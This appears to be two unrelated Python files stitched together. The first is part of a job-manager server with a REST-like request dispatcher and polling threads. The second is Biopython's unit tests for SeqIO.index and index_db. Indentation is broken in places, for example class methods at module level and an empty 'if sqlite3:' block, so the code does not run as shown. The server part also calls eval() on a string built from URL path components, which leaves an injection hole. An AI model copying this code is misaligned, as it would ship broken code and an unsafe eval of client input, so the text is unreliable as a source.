        # the path with the actual name in list order.
        # This is simply a short hand way to access indexed
        # offsets.
        l_path = str_path.split('/')
        jobID = l_path[1]
        # Does the jobID start with an underscore?
        if jobID[0] == '_':
            jobOffset = jobID[1:]
            l_rootdir = list(p.lstr_lsnode('/'))
            self.dp.qprint('jobOffset = %s' % jobOffset)
            self.dp.qprint(l_rootdir)
            try:
                actualJob = l_rootdir[int(jobOffset)]
            except:
                # Offset out of range or non-numeric
                return False
            l_path[1] = actualJob
            str_path = '/'.join(l_path)
        # Mirror the requested path in the return tree
        r.mkdir(str_path)
        r.cd(str_path)
        r.cd('../')
        # if not r.graft(p, str_path):
        if not p.copy(startPath = str_path, destination = r)['status']:
            # We are probably trying to access a file...
            # First, remove the erroneous path in the return DB
            r.rm(str_path)
            # Now, we need to find the "file", parse the json layer
            # and save...
            n = 0
            contents = p.cat(str_path)
            str_pathFile = str_path
            l_path = str_path.split('/')
            totalPathLen = len(l_path)
            l_pathFile = []
            # Walk backwards up the path until a cat()-able file is found,
            # collecting the trailing components that index into it.
            while not contents and -1*n < totalPathLen:
                n -= 1
                str_pathFile = '/'.join(str_path.split('/')[0:n])
                contents = p.cat(str_pathFile)
                l_pathFile.append(l_path[n])
            if contents and n < 0:
                # Re-order the collected components and index into the
                # file's dict with a synthesized subscript expression.
                l_pathFile = l_pathFile[::-1]
                str_access = ""
                for l in l_pathFile:
                    str_access += "['%s']" % l
                self.dp.qprint('str_access = %s' % str_access)
                # NOTE(review): eval() on a string built from URL path
                # components -- the components only form dict subscripts,
                # but a malformed path surfaces here as the except below.
                try:
                    contents = eval('contents%s' % str_access)
                except:
                    contents = False
                r.touch(str_path, contents)
    # Restore the DB tree's working directory
    p.cd(pcwd)
    self.dp.qprint(r)
    # self.dp.qprint(dict(r.snode_root))
    self.dp.qprint(self.pp.pformat(dict(r.snode_root)).strip())
    return dict(r.snode_root)
    # return r
def process(self, request, **kwargs):
    """
    Process the message from a remote client.

    In some philosophical respects, this process() method in fact
    implements a REST-like API of its own: the raw request is decoded,
    its REST verb and path extracted, the client optionally authorized,
    and the payload dispatched to the GET / PUT / POST handlers.

    :param request: raw request bytes as received from the socket
    :return: response dict, or False for an empty request
    """
    if len(request):
        REST_header = ""
        REST_verb = ""
        str_path = ""
        json_payload = ""
        self.dp.qprint("Listener ID - %s: process() - handling request" % (self.worker_id))
        now = datetime.datetime.today()
        str_timeStamp = now.strftime('%Y-%m-%d %H:%M:%S.%f')
        # Banner: dump the incoming stream for debugging
        self.dp.qprint(Colors.YELLOW)
        self.dp.qprint("***********************************************")
        self.dp.qprint("***********************************************")
        self.dp.qprint("%s incoming data stream" % (str_timeStamp) )
        self.dp.qprint("***********************************************")
        self.dp.qprint("len = %d" % len(request))
        self.dp.qprint("***********************************************")
        self.dp.qprint(Colors.CYAN + "%s\n" % (request.decode()) + Colors.YELLOW)
        self.dp.qprint("***********************************************" + Colors.NO_COLOUR)
        # First line: "<VERB> <path> ..."; last line: the JSON payload
        l_raw = request.decode().split('\n')
        FORMtype = l_raw[0].split('/')[0]
        self.dp.qprint('Request = ...')
        self.dp.qprint(l_raw)
        REST_header = l_raw[0]
        REST_verb = REST_header.split()[0]
        str_path = REST_header.split()[1]
        json_payload = l_raw[-1]
        # remove trailing '/' if any on path
        if str_path[-1] == '/': str_path = str_path[0:-1]
        d_ret = {'status': False,
                 'RESTheader': REST_header,
                 'RESTverb': REST_verb,
                 'action': "",
                 'path': str_path,
                 'receivedByServer': l_raw}
        self.dp.qprint("Using token authentication: %s" % self.b_tokenAuth)
        # Either token auth is disabled, or the auth module must accept
        if (not self.b_tokenAuth) or self.authModule.authorizeClientRequest(request.decode())[0]:
            self.dp.qprint("Request authorized")
            if REST_verb == 'GET':
                d_ret['GET'] = self.DB_get(path = str_path)
                d_ret['status'] = True
            self.dp.qprint('json_payload = %s' % self.pp.pformat(json_payload).strip())
            d_ret['client_json_payload'] = json_payload
            d_ret['client_json_len'] = len(json_payload)
            if len(json_payload):
                d_payload = json.loads(json_payload)
                d_request = d_payload['payload']
                payload_verb = d_request['action']
                if 'meta' in d_request.keys():
                    d_meta = d_request['meta']
                d_ret['payloadsize'] = len(json_payload)
                if payload_verb == 'quit':
                    # NOTE(review): only logs and sets status here; the
                    # actual shutdown is handled by the caller/framework.
                    self.dp.qprint('Shutting down server...')
                    d_ret['status'] = True
                if payload_verb == 'run' and REST_verb == 'PUT':
                    d_ret['action'] = payload_verb
                    self.processPUT( request = d_request)
                    d_ret['status'] = True
                if REST_verb == 'POST':
                    # processPOST mutates d_ret in place with the result
                    self.processPOST( request = d_request,
                                      ret = d_ret)
        else:
            self.dp.qprint("Request unauthorized")
        return d_ret
    else:
        return False
def methodName_parse(self, **kwargs):
    """
    Build the name of the processing method for a request.

    The base name is 't_<action>_process'; when the request meta
    carries a 'container' directive, a suffix selects the
    environment-specific variant: '_openshift' or '_container' (swarm).

    :return: the method name string
    """
    for k, v in kwargs.items():
        if k == 'request': d_request = v
    str_action = d_request['action']
    str_suffix = ""
    d_meta = d_request.get('meta', {})
    if 'container' in d_meta:
        if self.container_env == 'openshift':
            # redirect to the openshift-specific handler
            str_suffix = '_openshift'
        elif self.container_env == 'swarm':
            # redirect to the swarm/container-specific handler
            str_suffix = '_container'
    return 't_%s_process%s' % (str_action, str_suffix)
def processPOST(self, **kwargs):
    """
    Dispatcher for POST requests.

    Resolves the handler method from the request 'action' (plus a
    container-environment suffix via methodName_parse()) and either
    runs it in a new thread (when meta 'threaded' is true) or inline,
    folding the handler's result into the 'ret' dictionary.

    kwargs:
        request : the decoded client request dict
        ret     : the response dict to populate (mutated in place)

    :return: the populated 'ret' dict
    :raises NotImplementedError: when no handler exists for the action.
    """
    for k, v in kwargs.items():
        if k == 'request': d_request = v
        if k == 'ret':     d_ret = v
    payload_verb = d_request['action']
    if 'meta' in d_request.keys():
        d_meta = d_request['meta']
    d_ret['action'] = payload_verb
    d_ret['meta'] = d_meta
    b_threaded = False
    if 'threaded' in d_meta.keys():
        b_threaded = d_meta['threaded']
    if b_threaded:
        self.dp.qprint("Will process request in new thread.")
        pf_method = None
        str_method = self.methodName_parse(request = d_request)
        try:
            pf_method = getattr(self, str_method)
        except AttributeError:
            # FIX: report this instance's actual class; the previous
            # 'pman.__class__.__name__' named the metaclass, not the
            # serving class.
            raise NotImplementedError("Class `{}` does not implement `{}`".format(
                self.__class__.__name__, str_method))
        t_process = threading.Thread( target = pf_method,
                                      args = (),
                                      kwargs = kwargs)
        t_process.start()
        # Give the worker a moment to spin up before replying
        time.sleep(0.1)
        d_ret['status'] = True
    else:
        self.dp.qprint("Will process request in current thread.")
        # FIX: dispatch via getattr instead of eval() -- same semantics
        # (AttributeError on a missing handler) without evaluating a
        # string built from client-controlled input.
        d_done = getattr(self, 't_%s_process' % payload_verb)(request = d_request)
        try:
            d_ret['d_ret'] = d_done["d_ret"]
            d_ret['status'] = d_done["status"]
        except:
            self.dp.qprint("An error occurred in reading ret structure. Should this method have been threaded?")
    return d_ret
def processPUT(self, **kwargs):
    """
    Dispatcher for PUT requests.

    Handles DB save/load operations (request meta 'context' == 'db'),
    optionally restricting the DB tree to jobs matching a search key in
    the request meta before the file I/O is performed.
    """
    d_request = {}
    str_action = "run"
    # FIX: previously str_context was never initialized, so a request
    # whose meta carried no 'context' raised NameError at the final
    # comparison below. With an empty default the DB operation is
    # simply skipped.
    str_context = ""
    str_cmd = "save"
    str_DBpath = self.str_DBpath
    str_fileio = "json"
    tree_DB = self.within.ptree
    for k, v in kwargs.items():
        if k == 'request': d_request = v
    str_action = d_request['action']
    self.dp.qprint('action = %s' % str_action)
    d_meta = d_request['meta']
    # Optional search criteria: restrict the DB tree to matching jobs
    if 'key' in d_meta:
        d_search = self.t_search_process(request = d_request)['d_ret']
        Tj = C_stree()
        Tdb = C_stree()
        for j in d_search.keys():
            d_j = d_search[j]
            for job in d_j.keys():
                str_pathJob = '/api/v1/' + job
                d_job = self.DB_get(path = str_pathJob)
                Tj.initFromDict(d_job)
                Tj.copy(startPath = '/', destination = Tdb)
        tree_DB = Tdb
    if 'context'   in d_meta: str_context = d_meta['context']
    if 'operation' in d_meta: str_cmd     = d_meta['operation']
    if 'dbpath'    in d_meta: str_DBpath  = d_meta['dbpath']
    if 'fileio'    in d_meta: str_fileio  = d_meta['fileio']
    if str_action.lower() == 'run' and str_context.lower() == 'db':
        self.within.DB_fileIO( cmd    = str_cmd,
                               fileio = str_fileio,
                               dbpath = str_DBpath,
                               db     = tree_DB)
class Poller(threading.Thread):
    """
    The Poller checks for running processes based on the internal
    DB and system process table. Jobs that are no longer running are
    removed from the internal DB.

    It wraps a Crunner worker thread and relays that worker's job
    start/end/all-done queues upward to its own queues.
    """

    def __init__(self, **kwargs):
        """
        Construct the poller.

        kwargs:
            pollTime    : polling interval (default 10; currently unused
                          by run())
            cmd         : the command line the wrapped Crunner will run
            debugFile   : file for debug output (default /dev/null)
            debugToFile : whether debug output goes to the file
            verbosity   : debug verbosity level
        """
        self.pollTime = 10
        self.str_cmd = ""
        self.crunner = None
        # Relay queues: job-start info, job-end info, "all jobs done".
        self.queueStart = queue.Queue()
        self.queueEnd = queue.Queue()
        self.queueAllDone = queue.Queue()
        self.__name__ = 'Poller'
        # self.dp.qprint('starting...', level=-1)
        # Debug parameters
        self.str_debugFile = '/dev/null'
        self.b_debugToFile = True
        self.verbosity = 1
        for key, val in kwargs.items():
            if key == 'pollTime':    self.pollTime = val
            if key == 'cmd':         self.str_cmd = val
            if key == 'debugFile':   self.str_debugFile = val
            if key == 'debugToFile': self.b_debugToFile = val
            if key == 'verbosity':   self.verbosity = int(val)
        self.dp = pfmisc.debug(
            verbosity   = self.verbosity,
            debugFile   = self.str_debugFile,
            debugToFile = self.b_debugToFile,
            within      = self.__name__)
        threading.Thread.__init__(self)

    def run(self):
        """ Main execution. """
        # NOTE(review): 'timeout' and 'loop' are assigned but never used.
        timeout = 1
        loop = 10
        # Spawn the crunner object container
        self.crunner = Crunner(cmd = self.str_cmd,
                               debugToFile = self.b_debugToFile,
                               verbosity = self.verbosity,
                               debugFile = self.str_debugFile)
        self.crunner.start()
        b_jobsAllDone = False
        while not b_jobsAllDone:
            try:
                b_jobsAllDone = self.crunner.queueAllDone.get_nowait()
            except queue.Empty:
                # We basically propagate the queue contents "up" the chain.
                self.dp.qprint('Waiting on start job info')
                self.queueStart.put(self.crunner.queueStart.get())
                self.dp.qprint('Waiting on end job info')
                self.queueEnd.put(self.crunner.queueEnd.get())
        self.queueAllDone.put(b_jobsAllDone)
        self.dp.qprint("done with Poller.run")
class Crunner(threading.Thread):
    """
    The wrapper thread about the actual process.

    Runs ``str_cmd`` through a crunner shell object, publishes each
    job's state dictionary on ``queueStart`` / ``queueEnd``, and
    signals overall completion on ``queueAllDone``.
    """

    def __init__(self, **kwargs):
        """
        Construct the Crunner.

        Recognised kwargs:
            cmd         : command string to execute
            debugFile   : destination file for debug output
            debugToFile : bool, write debug output to ``debugFile``
            verbosity   : int, debug verbosity level
        """
        self.__name = "Crunner"
        self.queueStart = queue.Queue()
        self.queueEnd = queue.Queue()
        self.queueAllDone = queue.Queue()
        self.str_cmd = ""

        # Debug parameters
        self.str_debugFile = '/dev/null'
        self.b_debugToFile = True
        self.verbosity = 1

        for k, v in kwargs.items():
            if k == 'cmd':         self.str_cmd = v
            if k == 'debugFile':   self.str_debugFile = v
            if k == 'debugToFile': self.b_debugToFile = v
            if k == 'verbosity':   self.verbosity = int(v)

        self.shell = crunner(verbosity   = self.verbosity,
                             debugToFile = self.b_debugToFile,
                             debugFile   = self.str_debugFile)
        self.dp = pfmisc.debug(
            verbosity   = self.verbosity,
            debugFile   = self.str_debugFile,
            debugToFile = self.b_debugToFile,
            within      = self.__name)
        self.dp.qprint('starting crunner...')
        threading.Thread.__init__(self)

    def jsonJobInfo_queuePut(self, **kwargs):
        """
        Put a copy of the shell's current job dictionary onto the
        queue selected by kwarg ``queue``: 'startQueue' (default)
        or 'endQueue'.

        Fix: the local holding the target queue was itself named
        ``queue``, shadowing the stdlib ``queue`` module (and the
        original docstring wrongly claimed a JSON string is returned).
        """
        str_queue = 'startQueue'
        for k, v in kwargs.items():
            if k == 'queue': str_queue = v
        # Unknown selectors fall back to the start queue rather than
        # crashing on the shadowed module as before.
        q_target = self.queueStart
        if str_queue == 'endQueue':
            q_target = self.queueEnd
        q_target.put(self.shell.d_job.copy())

    def run(self):
        """
        Main execution: run the command, stream per-job info via the
        loop-control callbacks, then emit completion sentinels on all
        three queues.

        Fix: removed the unused ``timeout``/``loop`` locals that
        preceded (and thereby invalidated) the original docstring.
        """
        self.dp.qprint("running...")
        self.shell(self.str_cmd)
        self.shell.jobs_loopctl(onJobStart = partial(self.jsonJobInfo_queuePut, queue="startQueue"),
                                onJobDone  = partial(self.jsonJobInfo_queuePut, queue="endQueue"))
        self.queueAllDone.put(True)
        self.queueStart.put({'allJobsStarted': True})
        self.queueEnd.put({'allJobsDone': True})
        self.dp.qprint('Crunner.run() returning...')
|
test_SeqIO_index.py | # Copyright 2009-2017 by Peter Cock. All rights reserved.
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
"""Unit tests for Bio.SeqIO.index(...) and index_db() functions."""
try:
import sqlite3
except ImportError:
# Try to run what tests we can on Jython
# where we don't expect this to be installed.
sqlite3 = None
import os
import unittest
import tempfile
import threading
import gzip
import warnings
from io import BytesIO
from io import StringIO
from Bio.SeqRecord import SeqRecord
from Bio import SeqIO
from Bio.SeqIO._index import _FormatToRandomAccess
from Bio import BiopythonParserWarning
from Bio import MissingPythonDependencyError
from seq_tests_common import compare_record
from test_SeqIO import SeqIOTestBaseClass
CUR_DIR = os.getcwd()
if sqlite3:
def raw_filenames(index_filename):
    """Open SQLite index and extract filenames (as is).

    Returns a 2-tuple, holding a list of strings, and the value
    of the meta_data.filenames_relative_to_index (or None).
    """
    con = sqlite3.dbapi2.connect(index_filename)
    name_rows = con.execute(
        "SELECT name FROM file_data ORDER BY file_number;"
    ).fetchall()
    filenames = [name for (name,) in name_rows]
    meta_row = con.execute(
        "SELECT value FROM meta_data WHERE key=?;",
        ("filenames_relative_to_index",),
    ).fetchone()
    if meta_row is None:
        # Legacy indexes have no such key at all.
        filenames_relative_to_index = None
    else:
        filenames_relative_to_index = meta_row[0].upper() == "TRUE"
    con.close()
    return filenames, filenames_relative_to_index
class OldIndexTest(unittest.TestCase):
    """Testing a pre-built index (make sure cross platform etc).

    >>> from Bio import SeqIO
    >>> d = SeqIO.index_db("triple_sff.idx", ["E3MFGYR02_no_manifest.sff", "greek.sff", "paired.sff"], "sff")
    >>> len(d)
    54
    """

    def setUp(self):
        # Several tests chdir into Roche/; always start from the suite root.
        os.chdir(CUR_DIR)

    def tearDown(self):
        # Restore the working directory for whatever test runs next.
        os.chdir(CUR_DIR)

    def test_old(self):
        """Load existing index with no options (from parent directory)."""
        d = SeqIO.index_db("Roche/triple_sff.idx")
        self.assertEqual(54, len(d))
        # This index records bare filenames, so resolving the data files
        # from the parent directory fails.
        self.assertRaises(FileNotFoundError, d.get_raw, "alpha")

    def test_old_check_same_thread(self):
        """Setting check_same_thread to False doesn't raise an exception."""
        d = SeqIO.index_db("Roche/triple_sff_rel_paths.idx")

        def reader_thread():
            # Access from a second thread: only passes if the SQLite
            # connection was opened with check_same_thread=False.
            try:
                d["alpha"]
            except sqlite3.ProgrammingError:
                self.fail(
                    "Raised sqlite3.ProgrammingError in violation of check_same_thread=False"
                )

        reader = threading.Thread(target=reader_thread)
        reader.start()
        reader.join()

    def test_old_rel(self):
        """Load existing index (with relative paths) with no options (from parent directory)."""
        d = SeqIO.index_db("Roche/triple_sff_rel_paths.idx")
        self.assertEqual(54, len(d))
        self.assertEqual(395, len(d["alpha"]))

    def test_old_contents(self):
        """Check actual filenames in existing indexes."""
        filenames, flag = raw_filenames("Roche/triple_sff.idx")
        # Legacy index: no filenames_relative_to_index key at all.
        self.assertEqual(flag, None)
        self.assertEqual(
            filenames, ["E3MFGYR02_no_manifest.sff", "greek.sff", "paired.sff"]
        )
        filenames, flag = raw_filenames("Roche/triple_sff_rel_paths.idx")
        self.assertEqual(flag, True)
        self.assertEqual(
            filenames, ["E3MFGYR02_no_manifest.sff", "greek.sff", "paired.sff"]
        )

    def test_old_same_dir(self):
        """Load existing index with no options (from same directory)."""
        os.chdir("Roche")
        d = SeqIO.index_db("triple_sff.idx")
        self.assertEqual(54, len(d))
        self.assertEqual(395, len(d["alpha"]))

    def test_old_same_dir_rel(self):
        """Load existing index (with relative paths) with no options (from same directory)."""
        os.chdir("Roche")
        d = SeqIO.index_db("triple_sff_rel_paths.idx")
        self.assertEqual(54, len(d))
        self.assertEqual(395, len(d["alpha"]))

    def test_old_format(self):
        """Load existing index with correct format."""
        d = SeqIO.index_db("Roche/triple_sff.idx", format="sff")
        self.assertEqual(54, len(d))

    def test_old_format_wrong(self):
        """Load existing index with wrong format."""
        self.assertRaises(
            ValueError, SeqIO.index_db, "Roche/triple_sff.idx", format="fasta"
        )

    def test_old_files(self):
        """Load existing index with correct files (from parent directory)."""
        d = SeqIO.index_db(
            "Roche/triple_sff.idx",
            ["E3MFGYR02_no_manifest.sff", "greek.sff", "paired.sff"],
        )
        self.assertEqual(54, len(d))
        # Filenames match but are not resolvable from the parent dir.
        self.assertRaises(FileNotFoundError, d.get_raw, "alpha")

    def test_old_files_same_dir(self):
        """Load existing index with correct files (from same directory)."""
        os.chdir("Roche")
        d = SeqIO.index_db(
            "triple_sff.idx",
            ["E3MFGYR02_no_manifest.sff", "greek.sff", "paired.sff"],
        )
        self.assertEqual(54, len(d))
        self.assertEqual(395, len(d["alpha"]))

    def test_old_files_wrong(self):
        """Load existing index with wrong files."""
        self.assertRaises(
            ValueError,
            SeqIO.index_db,
            "Roche/triple_sff.idx",
            ["a.sff", "b.sff", "c.sff"],
        )

    def test_old_files_wrong2(self):
        """Load existing index with wrong number of files."""
        self.assertRaises(
            ValueError,
            SeqIO.index_db,
            "Roche/triple_sff.idx",
            ["E3MFGYR02_no_manifest.sff", "greek.sff"],
        )
class NewIndexTest(unittest.TestCase):
    """Check paths etc in newly built index."""

    def setUp(self):
        os.chdir(CUR_DIR)

    def tearDown(self):
        os.chdir(CUR_DIR)
        # Remove any index files a failed check() left behind.
        for i in ["temp.idx", "Roche/temp.idx"]:
            if os.path.isfile(i):
                os.remove(i)

    def check(self, index_file, sff_files, expt_sff_files):
        # Build an index over sff_files, then verify both what the live
        # object resolved and the raw names stored in SQLite match
        # expt_sff_files; finally reload and re-verify.
        if os.path.isfile(index_file):
            os.remove(index_file)
        # Build index...
        d = SeqIO.index_db(index_file, sff_files, "sff")
        self.assertEqual(395, len(d["alpha"]))
        d._con.close()  # hack for PyPy
        d.close()
        # NOTE(review): d._filenames is read after close(); appears to rely
        # on it being a plain attribute that survives closing -- confirm.
        self.assertEqual(
            [os.path.abspath(f) for f in sff_files],
            [os.path.abspath(f) for f in d._filenames],
        )
        # Now directly check the filenames inside the SQLite index:
        filenames, flag = raw_filenames(index_file)
        self.assertEqual(flag, True)
        self.assertEqual(filenames, expt_sff_files)
        # Load index...
        d = SeqIO.index_db(index_file, sff_files)
        self.assertEqual(395, len(d["alpha"]))
        d._con.close()  # hack for PyPy
        d.close()
        self.assertEqual([os.path.abspath(f) for f in sff_files], d._filenames)
        os.remove(index_file)

    def test_child_folder_rel(self):
        """Check relative links to child folder."""
        # Note we expect relative paths recorded with Unix slashs!
        expt_sff_files = [
            "Roche/E3MFGYR02_no_manifest.sff",
            "Roche/greek.sff",
            "Roche/paired.sff",
        ]

        self.check("temp.idx", expt_sff_files, expt_sff_files)
        # Here index is given as abs
        self.check(
            os.path.abspath("temp.idx"),
            [
                "Roche/E3MFGYR02_no_manifest.sff",
                os.path.abspath("Roche/greek.sff"),
                "Roche/paired.sff",
            ],
            expt_sff_files,
        )
        # Here index is given as relative path
        self.check(
            "temp.idx",
            [
                "Roche/E3MFGYR02_no_manifest.sff",
                os.path.abspath("Roche/greek.sff"),
                "Roche/paired.sff",
            ],
            expt_sff_files,
        )

    def test_same_folder(self):
        """Check relative links in same folder."""
        os.chdir("Roche")
        expt_sff_files = ["E3MFGYR02_no_manifest.sff", "greek.sff", "paired.sff"]

        # Here everything is relative,
        self.check("temp.idx", expt_sff_files, expt_sff_files)
        self.check(
            os.path.abspath("temp.idx"),
            [
                "E3MFGYR02_no_manifest.sff",
                os.path.abspath("greek.sff"),
                "../Roche/paired.sff",
            ],
            expt_sff_files,
        )
        self.check(
            "temp.idx",
            [
                "E3MFGYR02_no_manifest.sff",
                os.path.abspath("greek.sff"),
                "../Roche/paired.sff",
            ],
            expt_sff_files,
        )
        self.check(
            "../Roche/temp.idx",
            [
                "E3MFGYR02_no_manifest.sff",
                os.path.abspath("greek.sff"),
                "../Roche/paired.sff",
            ],
            expt_sff_files,
        )

    def test_some_abs(self):
        """Check absolute filenames in index.

        Unless the repository and tests themselves are under the temp
        directory (as detected by ``tempfile``), we expect the index to
        use absolute filenames.
        """
        h, t = tempfile.mkstemp(prefix="index_test_", suffix=".idx")
        os.close(h)
        os.remove(t)

        abs_sff_files = [
            os.path.abspath("Roche/E3MFGYR02_no_manifest.sff"),
            os.path.abspath("Roche/greek.sff"),
            os.path.abspath(os.path.join("Roche", "paired.sff")),
        ]

        if os.getcwd().startswith(os.path.dirname(t)):
            # The tests are being run from within the temp directory,
            # e.g. index filename /tmp/index_test_XYZ.idx
            # and working directory of /tmp/biopython/Tests/
            # This means the indexing will use a RELATIVE path
            # e.g. biopython/Tests/Roche/E3MFGYR02_no_manifest.sff
            # not /tmp/biopython/Tests/Roche/E3MFGYR02_no_manifest.sff
            expt_sff_files = [
                os.path.relpath(f, os.path.dirname(t)) for f in abs_sff_files
            ]
        else:
            expt_sff_files = abs_sff_files

        # Providing absolute paths...
        self.check(t, abs_sff_files, expt_sff_files)
        # Now try with mix of abs and relative paths...
        self.check(
            t,
            [
                os.path.abspath("Roche/E3MFGYR02_no_manifest.sff"),
                os.path.join("Roche", "greek.sff"),
                os.path.abspath("Roche/paired.sff"),
            ],
            expt_sff_files,
        )
class IndexDictTests(SeqIOTestBaseClass):
    """Exercise SeqIO.index and SeqIO.index_db across many formats."""

    # (filename, format) pairs covering every random-access parser.
    tests = [
        ("Ace/contig1.ace", "ace"),
        ("Ace/consed_sample.ace", "ace"),
        ("Ace/seq.cap.ace", "ace"),
        ("Quality/wrapping_original_sanger.fastq", "fastq"),
        ("Quality/example.fastq", "fastq"),  # Unix newlines
        ("Quality/example.fastq", "fastq-sanger"),
        ("Quality/example_dos.fastq", "fastq"),  # DOS/Windows newlines
        ("Quality/tricky.fastq", "fastq"),
        ("Quality/sanger_faked.fastq", "fastq-sanger"),
        ("Quality/solexa_faked.fastq", "fastq-solexa"),
        ("Quality/illumina_faked.fastq", "fastq-illumina"),
        ("Quality/zero_length.fastq", "fastq"),
        ("EMBL/epo_prt_selection.embl", "embl"),
        ("EMBL/U87107.embl", "embl"),
        ("EMBL/TRBG361.embl", "embl"),
        ("EMBL/kipo_prt_sample.embl", "embl"),
        ("EMBL/A04195.imgt", "embl"),  # Not a proper EMBL file, an IMGT file
        ("EMBL/A04195.imgt", "imgt"),
        ("EMBL/hla_3260_sample.imgt", "imgt"),
        ("EMBL/patents.embl", "embl"),
        ("EMBL/AAA03323.embl", "embl"),
        ("GenBank/NC_000932.faa", "fasta"),
        ("GenBank/NC_005816.faa", "fasta"),
        ("GenBank/NC_005816.tsv", "tab"),
        ("GenBank/NC_005816.ffn", "fasta"),
        ("GenBank/NC_005816.fna", "fasta"),
        ("GenBank/NC_005816.gb", "gb"),
        ("GenBank/cor6_6.gb", "genbank"),
        ("GenBank/empty_accession.gbk", "gb"),
        ("GenBank/empty_version.gbk", "gb"),
        ("IntelliGenetics/vpu_nucaligned.txt", "ig"),
        ("IntelliGenetics/TAT_mase_nuc.txt", "ig"),
        ("IntelliGenetics/VIF_mase-pro.txt", "ig"),
        ("Phd/phd1", "phd"),
        ("Phd/phd2", "phd"),
        ("Phd/phd_solexa", "phd"),
        ("Phd/phd_454", "phd"),
        ("NBRF/B_nuc.pir", "pir"),
        ("NBRF/Cw_prot.pir", "pir"),
        ("NBRF/clustalw.pir", "pir"),
        ("SwissProt/sp001", "swiss"),
        ("SwissProt/sp010", "swiss"),
        ("SwissProt/sp016", "swiss"),
        ("SwissProt/multi_ex.txt", "swiss"),
        ("SwissProt/multi_ex.xml", "uniprot-xml"),
        ("SwissProt/multi_ex.fasta", "fasta"),
        ("Roche/E3MFGYR02_random_10_reads.sff", "sff"),
        ("Roche/E3MFGYR02_random_10_reads.sff", "sff-trim"),
        ("Roche/E3MFGYR02_index_at_start.sff", "sff"),
        ("Roche/E3MFGYR02_index_in_middle.sff", "sff"),
        ("Roche/E3MFGYR02_alt_index_at_start.sff", "sff"),
        ("Roche/E3MFGYR02_alt_index_in_middle.sff", "sff"),
        ("Roche/E3MFGYR02_alt_index_at_end.sff", "sff"),
        ("Roche/E3MFGYR02_no_manifest.sff", "sff"),
        ("Roche/greek.sff", "sff"),
        ("Roche/greek.sff", "sff-trim"),
        ("Roche/paired.sff", "sff"),
        ("Roche/paired.sff", "sff-trim"),
    ]

    def setUp(self):
        os.chdir(CUR_DIR)
        # Fresh scratch file used by simple_check for on-disk indexes.
        h, self.index_tmp = tempfile.mkstemp("_idx.tmp")
        os.close(h)

    def tearDown(self):
        os.chdir(CUR_DIR)
        if os.path.isfile(self.index_tmp):
            os.remove(self.index_tmp)

    def check_dict_methods(self, rec_dict, keys, ids, msg):
        # Verify rec_dict behaves like a read-only mapping keys -> records.
        self.assertEqual(set(keys), set(rec_dict), msg=msg)
        # This is redundant, I just want to make sure len works:
        self.assertEqual(len(keys), len(rec_dict), msg=msg)
        # Make sure boolean evaluation works
        self.assertEqual(bool(keys), bool(rec_dict), msg=msg)
        for key, id in zip(keys, ids):
            self.assertIn(key, rec_dict, msg=msg)
            self.assertEqual(id, rec_dict[key].id, msg=msg)
            self.assertEqual(id, rec_dict.get(key).id, msg=msg)
        # Check non-existant keys,
        assert chr(0) not in keys, "Bad example in test"
        with self.assertRaises(KeyError, msg=msg):
            rec = rec_dict[chr(0)]
        self.assertEqual(rec_dict.get(chr(0)), None, msg=msg)
        self.assertEqual(rec_dict.get(chr(0), chr(1)), chr(1), msg=msg)
        # Python-2 style iteritems must not exist:
        with self.assertRaises(AttributeError, msg=msg):
            rec_dict.iteritems
        for key, rec in rec_dict.items():
            self.assertIn(key, keys, msg=msg)
            self.assertIsInstance(rec, SeqRecord, msg=msg)
            self.assertIn(rec.id, ids, msg=msg)
        for rec in rec_dict.values():
            # NOTE(review): `key` here is the stale value left over from the
            # items() loop above, so the same key is re-asserted on every
            # pass -- looks like a copy/paste slip; confirm intent.
            self.assertIn(key, keys, msg=msg)
            self.assertIsInstance(rec, SeqRecord, msg=msg)
            self.assertIn(rec.id, ids, msg=msg)

    def simple_check(self, filename, fmt, comp):
        """Check indexing (without a key function)."""
        msg = "Test failure parsing file %s with format %s" % (filename, fmt)
        if comp:
            # Compressed input: parse the reference id list via gzip.
            mode = "r" + self.get_mode(fmt)
            with gzip.open(filename, mode) as handle:
                id_list = [rec.id for rec in SeqIO.parse(handle, fmt)]
        else:
            id_list = [rec.id for rec in SeqIO.parse(filename, fmt)]

        with warnings.catch_warnings():
            if "_alt_index_" in filename:
                # BiopythonParserWarning: Could not parse the SFF index:
                # Unknown magic number b'.diy' in SFF index header:
                # b'.diy1.00'
                warnings.simplefilter("ignore", BiopythonParserWarning)
            rec_dict = SeqIO.index(filename, fmt)
            self.check_dict_methods(rec_dict, id_list, id_list, msg=msg)
            rec_dict.close()

        if not sqlite3:
            return

        # In memory,
        # note here give filenames as list of strings
        rec_dict = SeqIO.index_db(":memory:", [filename], fmt)
        self.check_dict_methods(rec_dict, id_list, id_list, msg=msg)
        rec_dict.close()

        # check error conditions
        with self.assertRaises(ValueError, msg=msg):
            SeqIO.index_db(":memory:", format="dummy")
        with self.assertRaises(ValueError, msg=msg):
            SeqIO.index_db(":memory:", filenames=["dummy"])

        # Saving to file...
        index_tmp = self.index_tmp
        if os.path.isfile(index_tmp):
            os.remove(index_tmp)

        # To disk,
        # note here we give the filename as a single string
        # to confirm that works too.
        rec_dict = SeqIO.index_db(index_tmp, filename, fmt)
        self.check_dict_methods(rec_dict, id_list, id_list, msg=msg)
        rec_dict.close()
        rec_dict._con.close()  # hack for PyPy

        # Now reload it...
        rec_dict = SeqIO.index_db(index_tmp, [filename], fmt)
        self.check_dict_methods(rec_dict, id_list, id_list, msg=msg)
        rec_dict.close()
        rec_dict._con.close()  # hack for PyPy

        # Now reload without passing filenames and format
        # and switch directory to check paths still work
        index_tmp = os.path.abspath(index_tmp)
        os.chdir(os.path.dirname(filename))
        try:
            rec_dict = SeqIO.index_db(index_tmp)
        finally:
            os.chdir(CUR_DIR)
        self.check_dict_methods(rec_dict, id_list, id_list, msg=msg)
        rec_dict.close()
        rec_dict._con.close()  # hack for PyPy
        os.remove(index_tmp)

    def add_prefix(self, key):
        """Sample key_function for testing index code."""
        return "id_" + key

    def key_check(self, filename, fmt, comp):
        """Check indexing with a key function."""
        msg = "Test failure parsing file %s with format %s" % (filename, fmt)
        if comp:
            mode = "r" + self.get_mode(fmt)
            with gzip.open(filename, mode) as handle:
                id_list = [rec.id for rec in SeqIO.parse(handle, fmt)]
        else:
            id_list = [rec.id for rec in SeqIO.parse(filename, fmt)]
        key_list = [self.add_prefix(id) for id in id_list]

        with warnings.catch_warnings():
            if "_alt_index_" in filename:
                # BiopythonParserWarning: Could not parse the SFF index:
